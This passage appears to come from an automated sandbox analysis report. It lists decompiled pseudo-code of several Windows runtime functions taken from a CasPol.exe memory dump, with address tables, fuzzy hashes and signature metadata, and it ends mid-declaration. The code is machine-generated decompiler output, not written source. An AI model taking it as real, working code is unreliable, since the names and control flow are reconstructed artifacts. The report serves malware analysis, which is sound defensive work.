					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E014753CA(0);
						return E0144D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0143F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = L01413690(1, _t117, 0x13d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0143AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01414620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0143AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0147500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01439860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                  0x014751be
                                                                  0x014751c3
                                                                  0x014751c8
                                                                  0x014751cd
                                                                  0x014751d0
                                                                  0x014751d3
                                                                  0x014751d8
                                                                  0x014751db
                                                                  0x014751de
                                                                  0x014751e0
                                                                  0x014751e3
                                                                  0x014751e6
                                                                  0x014751e8
                                                                  0x01475342
                                                                  0x01475351
                                                                  0x01475356
                                                                  0x0147535a
                                                                  0x01475360
                                                                  0x01475363
                                                                  0x01475366
                                                                  0x01475369
                                                                  0x01475369
                                                                  0x0147536b
                                                                  0x0147536b
                                                                  0x01475370
                                                                  0x014753a3
                                                                  0x014753a4
                                                                  0x014753a6
                                                                  0x014753ab
                                                                  0x014753ab
                                                                  0x014753ae
                                                                  0x014753ae
                                                                  0x014753b5
                                                                  0x014753bf
                                                                  0x014753bf
                                                                  0x01475375
                                                                  0x01475396
                                                                  0x014753a0
                                                                  0x014753a0
                                                                  0x00000000
                                                                  0x01475396
                                                                  0x01475377
                                                                  0x01475379
                                                                  0x0147537f
                                                                  0x0147538c
                                                                  0x01475390
                                                                  0x00000000
                                                                  0x01475390
                                                                  0x014751ee
                                                                  0x014751f1
                                                                  0x01475301
                                                                  0x01475310
                                                                  0x01475315
                                                                  0x01475318
                                                                  0x0147531b
                                                                  0x01475320
                                                                  0x0147532e
                                                                  0x01475331
                                                                  0x00000000
                                                                  0x01475331
                                                                  0x01475328
                                                                  0x01475329
                                                                  0x00000000
                                                                  0x01475329
                                                                  0x014751fa
                                                                  0x01475235
                                                                  0x01475236
                                                                  0x01475239
                                                                  0x0147523f
                                                                  0x01475240
                                                                  0x01475241
                                                                  0x01475242
                                                                  0x01475246
                                                                  0x01475247
                                                                  0x0147524e
                                                                  0x01475251
                                                                  0x01475267
                                                                  0x01475269
                                                                  0x0147526e
                                                                  0x0147527d
                                                                  0x0147527e
                                                                  0x01475281
                                                                  0x01475282
                                                                  0x01475287
                                                                  0x01475288
                                                                  0x0147528a
                                                                  0x0147528f
                                                                  0x01475294
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0147529a
                                                                  0x0147529c
                                                                  0x0147529e
                                                                  0x0147529e
                                                                  0x014752a4
                                                                  0x014752b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014752ba
                                                                  0x014752bc
                                                                  0x014752bc
                                                                  0x014752d4
                                                                  0x014752d9
                                                                  0x014752dc
                                                                  0x014752e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014752e7
                                                                  0x014752f4
                                                                  0x00000000
                                                                  0x014752f4
                                                                  0x01475270
                                                                  0x00000000
                                                                  0x01475270
                                                                  0x014751fc
                                                                  0x014751fd
                                                                  0x01475202
                                                                  0x01475203
                                                                  0x01475205
                                                                  0x0147520a
                                                                  0x0147520f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0147521b
                                                                  0x01475226
                                                                  0x0147522b
                                                                  0x0147521d
                                                                  0x0147521d
                                                                  0x01475222
                                                                  0x01475222
                                                                  0x0147522d
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                                                                  • Instruction ID: 720fa8eb764d2b89205582ddb77f01727253b34245818f627521c9f7adec2d2d
                                                                  • Opcode Fuzzy Hash: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                                                                  • Instruction Fuzzy Hash: D9516EB1E006099FDB25DFA9C940AAEBBF8FF58704F14442EE649EF261DB719901CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0141B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E0141B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x14ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01417D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L014C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L01439E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L0143B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L0143CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01417D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L014C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L0143AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x14e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x14e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x14e8628; // 0x0
							_t116 =  *0x14e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                  0x0141b94c
                                                                  0x0141b956
                                                                  0x0141b95c
                                                                  0x0141b95e
                                                                  0x0141b964
                                                                  0x0141b969
                                                                  0x0141b96d
                                                                  0x0141b96d
                                                                  0x0141b970
                                                                  0x0141b974
                                                                  0x0141b97a
                                                                  0x0141badf
                                                                  0x0141badf
                                                                  0x0141bae2
                                                                  0x0141bae4
                                                                  0x0141bae6
                                                                  0x0141baf0
                                                                  0x01462cb8
                                                                  0x0141baf6
                                                                  0x0141baf6
                                                                  0x0141baf6
                                                                  0x0141bafd
                                                                  0x0141bb1f
                                                                  0x0141bb1f
                                                                  0x0141baff
                                                                  0x0141bb00
                                                                  0x0141bb00
                                                                  0x0141bb03
                                                                  0x0141bb03
                                                                  0x0141bacb
                                                                  0x0141bacf
                                                                  0x0141bad0
                                                                  0x0141bad1
                                                                  0x0141badc
                                                                  0x0141badc
                                                                  0x0141b980
                                                                  0x0141b980
                                                                  0x0141b988
                                                                  0x0141b98b
                                                                  0x0141b98d
                                                                  0x0141b990
                                                                  0x0141b993
                                                                  0x0141b999
                                                                  0x0141b99b
                                                                  0x0141b9a1
                                                                  0x0141b9a5
                                                                  0x0141b9aa
                                                                  0x0141b9b0
                                                                  0x0141b9bb
                                                                  0x0141b9c0
                                                                  0x0141b9c3
                                                                  0x0141b9ca
                                                                  0x0141b9cc
                                                                  0x0141b9cf
                                                                  0x0141b9d3
                                                                  0x0141b9d7
                                                                  0x0141ba94
                                                                  0x0141ba94
                                                                  0x0141ba98
                                                                  0x0141baa3
                                                                  0x01462ccb
                                                                  0x0141baa9
                                                                  0x0141baa9
                                                                  0x0141baa9
                                                                  0x0141bab1
                                                                  0x01462cd5
                                                                  0x01462cdd
                                                                  0x01462cdd
                                                                  0x0141babb
                                                                  0x0141babc
                                                                  0x0141bac2
                                                                  0x0141bac3
                                                                  0x0141bac3
                                                                  0x0141bac6
                                                                  0x00000000
                                                                  0x0141b9dd
                                                                  0x0141b9dd
                                                                  0x0141b9e7
                                                                  0x0141b9e7
                                                                  0x0141b9ec
                                                                  0x0141b9ec
                                                                  0x0141b9f1
                                                                  0x0141b9f5
                                                                  0x0141b9fa
                                                                  0x0141ba00
                                                                  0x0141ba0c
                                                                  0x0141ba10
                                                                  0x0141ba10
                                                                  0x0141ba12
                                                                  0x0141ba18
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141bb26
                                                                  0x0141bb26
                                                                  0x0141ba1e
                                                                  0x0141ba1e
                                                                  0x0141ba23
                                                                  0x0141ba25
                                                                  0x0141ba2c
                                                                  0x0141ba30
                                                                  0x0141ba35
                                                                  0x0141ba35
                                                                  0x0141ba41
                                                                  0x0141ba46
                                                                  0x0141ba4c
                                                                  0x0141ba50
                                                                  0x0141ba54
                                                                  0x0141ba6a
                                                                  0x0141ba6e
                                                                  0x0141ba70
                                                                  0x0141ba74
                                                                  0x0141ba78
                                                                  0x0141ba7a
                                                                  0x0141ba7c
                                                                  0x0141ba8e
                                                                  0x0141ba90
                                                                  0x0141ba92
                                                                  0x0141bb14
                                                                  0x0141bb14
                                                                  0x0141bb16
                                                                  0x0141bb16
                                                                  0x00000000
                                                                  0x0141ba7c
                                                                  0x0141bb0a
                                                                  0x0141bb0d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141bb0f

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141B9A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 885266447-0
                                                                  • Opcode ID: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                                                                  • Instruction ID: 8d61aeced6279e58ca3e69d61fcda6ef66e515b50288726f50cbd964a33c5497
                                                                  • Opcode Fuzzy Hash: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                                                                  • Instruction Fuzzy Hash: 79515771A08341CFC721DF69C48092BBBF5FB88650F14896FEA8997769D770E841CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E013FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x14cf7a8);
				E0144D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0144D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0143D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0143F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0144DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0143B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L0143B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0143E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0143A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                  0x013fb171
                                                                  0x013fb171
                                                                  0x013fb171
                                                                  0x013fb171
                                                                  0x013fb171
                                                                  0x013fb176
                                                                  0x013fb17b
                                                                  0x013fb180
                                                                  0x013fb186
                                                                  0x013fb18f
                                                                  0x013fb198
                                                                  0x013fb1a4
                                                                  0x013fb1aa
                                                                  0x01454802
                                                                  0x01454802
                                                                  0x01454805
                                                                  0x0145480c
                                                                  0x0145480e
                                                                  0x013fb1d1
                                                                  0x013fb1d3
                                                                  0x013fb1de
                                                                  0x013fb1de
                                                                  0x01454817
                                                                  0x0145481e
                                                                  0x01454820
                                                                  0x01454822
                                                                  0x01454822
                                                                  0x01454824
                                                                  0x01454824
                                                                  0x0145482a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454835
                                                                  0x0145483a
                                                                  0x0145483d
                                                                  0x0145483f
                                                                  0x01454842
                                                                  0x01454842
                                                                  0x01454842
                                                                  0x01454846
                                                                  0x0145484c
                                                                  0x0145484e
                                                                  0x01454851
                                                                  0x01454851
                                                                  0x01454853
                                                                  0x01454854
                                                                  0x01454854
                                                                  0x01454858
                                                                  0x0145485a
                                                                  0x0145485a
                                                                  0x0145485d
                                                                  0x0145485f
                                                                  0x01454861
                                                                  0x01454861
                                                                  0x01454866
                                                                  0x0145486b
                                                                  0x0145486e
                                                                  0x01454871
                                                                  0x01454876
                                                                  0x01454876
                                                                  0x01454878
                                                                  0x0145487b
                                                                  0x01454884
                                                                  0x01454884
                                                                  0x00000000
                                                                  0x0145487d
                                                                  0x0145487d
                                                                  0x01454882
                                                                  0x01454889
                                                                  0x01454889
                                                                  0x0145488f
                                                                  0x01454891
                                                                  0x014548e0
                                                                  0x014548e2
                                                                  0x014548e4
                                                                  0x014548e4
                                                                  0x014548e7
                                                                  0x014548e7
                                                                  0x014548ed
                                                                  0x014548f4
                                                                  0x014548f6
                                                                  0x01454951
                                                                  0x01454951
                                                                  0x01454953
                                                                  0x01454953
                                                                  0x01454956
                                                                  0x01454956
                                                                  0x01454958
                                                                  0x01454959
                                                                  0x01454959
                                                                  0x0145495d
                                                                  0x0145495d
                                                                  0x0145495f
                                                                  0x0145495f
                                                                  0x01454965
                                                                  0x01454969
                                                                  0x014549ba
                                                                  0x014549ba
                                                                  0x014549c1
                                                                  0x014549c5
                                                                  0x014549cc
                                                                  0x014549d4
                                                                  0x014549d7
                                                                  0x014549da
                                                                  0x014549e4
                                                                  0x014549e5
                                                                  0x014549f3
                                                                  0x01454a02
                                                                  0x00000000
                                                                  0x01454a02
                                                                  0x01454972
                                                                  0x01454974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454976
                                                                  0x01454979
                                                                  0x01454982
                                                                  0x01454983
                                                                  0x01454984
                                                                  0x0145498b
                                                                  0x0145498d
                                                                  0x01454991
                                                                  0x01454993
                                                                  0x01454999
                                                                  0x0145499d
                                                                  0x014549a2
                                                                  0x014549a2
                                                                  0x014549a2
                                                                  0x01454999
                                                                  0x014549ac
                                                                  0x00000000
                                                                  0x014549b3
                                                                  0x014548f8
                                                                  0x014548fe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548fe
                                                                  0x01454895
                                                                  0x0145489c
                                                                  0x014548ad
                                                                  0x014548b2
                                                                  0x014548b5
                                                                  0x014548b7
                                                                  0x014548ba
                                                                  0x014548bc
                                                                  0x014548c6
                                                                  0x014548c6
                                                                  0x014548cb
                                                                  0x014548d1
                                                                  0x014548d4
                                                                  0x014548d8
                                                                  0x014548d8
                                                                  0x00000000
                                                                  0x014548d8
                                                                  0x014548be
                                                                  0x014548c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548c2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548c4
                                                                  0x00000000
                                                                  0x01454882
                                                                  0x0145487b
                                                                  0x01454904
                                                                  0x01454906
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454908
                                                                  0x0145490e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454910
                                                                  0x01454917
                                                                  0x01454917
                                                                  0x00000000
                                                                  0x01454917
                                                                  0x013fb1ba
                                                                  0x014547f9
                                                                  0x014547fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014547fc
                                                                  0x013fb1c0
                                                                  0x013fb1c0
                                                                  0x013fb1c3
                                                                  0x013fb1cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: _vswprintf_s
                                                                  • String ID:
                                                                  • API String ID: 677850445-0
                                                                  • Opcode ID: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                                                                  • Instruction ID: 3b899781bb8dadfb3a67ddc757e90dae1a4677ca1f8aad380058c11781d4339a
                                                                  • Opcode Fuzzy Hash: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                                                                  • Instruction Fuzzy Hash: 4151F175D002598FEB71CF78C845BAEBBB0AF04714F1841AEDC59AB3A2E7304985CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 80%
                                                                  			E0142FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
